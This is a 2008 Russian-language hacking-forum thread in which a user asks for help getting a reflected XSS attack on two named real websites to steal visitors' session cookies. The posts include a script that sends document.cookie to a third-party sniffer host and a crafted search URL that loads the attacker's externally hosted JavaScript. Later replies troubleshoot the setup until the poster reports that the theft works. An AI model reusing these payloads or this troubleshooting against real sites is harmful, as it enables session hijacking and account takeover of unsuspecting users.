Помогите разобраться с Xss

Discussion in 'Песочница' started by AARON, 2 May 2008.

  1. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Здравствуйте, товарисчи!

    Помогите плз разобраться с XSS. Перечитал по инета... Не работает.

    Значит проблема такова: нашел я туеву хучу сайтов с пассивными xss. Алерт есть, вроде нихрена не фильтруется...

    Вот пару сайтов.

    www.pit-pc.ru
    www.softoman.ru

    Зарегил сниффер на s.netsec.ru. Логин у меня там nick_314

    составил соотв. запрос

    <script>img = new Image(); img.src = "http://s.netsec.ru/Nick_314.gif?"+document.cookie;</script>

    Сам перехожу по ссылке... По идее должен переходить мой sess_id, а вот хрен. Не пашет...

    Переводил в char - не приходит... Просвятите ламера, что не так?
     
  2. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Извините, перепутал раздел... Переместите , пожалуйста.
     
  3. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    допустим на pit-pc.ru фильтурет ковычки....
    сделай проще

    http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://твойсайт.ru/js.js></SCRIPT>

    где содержание js.js
    допустим такое
    Code:
    img = new Image(); img.src = "http://s.netsec.ru/nick_314.gif?"+document.cookie;
     
  4. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    Ты странный :)...
    searchstring="><
     
  5. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    в код глянь...=\
     
  6. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Спасибо большое, сейчас попробую.
     
  7. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Значит попробовал. Результат - ноль...

    ЗАрегился я по-быстренькому на Holm.ru
    http://www.angryhacker.h18.ru

    Залил Js.js

    Делаю соотв. запрос

    http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://www.angryhacker.h18.ru/js.js></SCRIPT>

    Не работает. Грешу на holm.ru...
     
    #7 AARON, 4 May 2008
    Last edited: 4 May 2008
  8. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Nick_314 - с большой или маленькой буквы? Просто захожу на http://s.netsec.ru/nick_314.gif - там ничего нет.
     
  9. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    :) Проверь ещё раз всё хорошенько)..всё должно работать)......ну на крайний зарегай на tu1.ru )
     
  10. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Все, разобрался. Теперь работает. Как выяснилось, логин nick_314 почему-то не работал... Я просто зарегил новый и теперь все тип-топ!

    Спасибо за помошь, можно закрывать.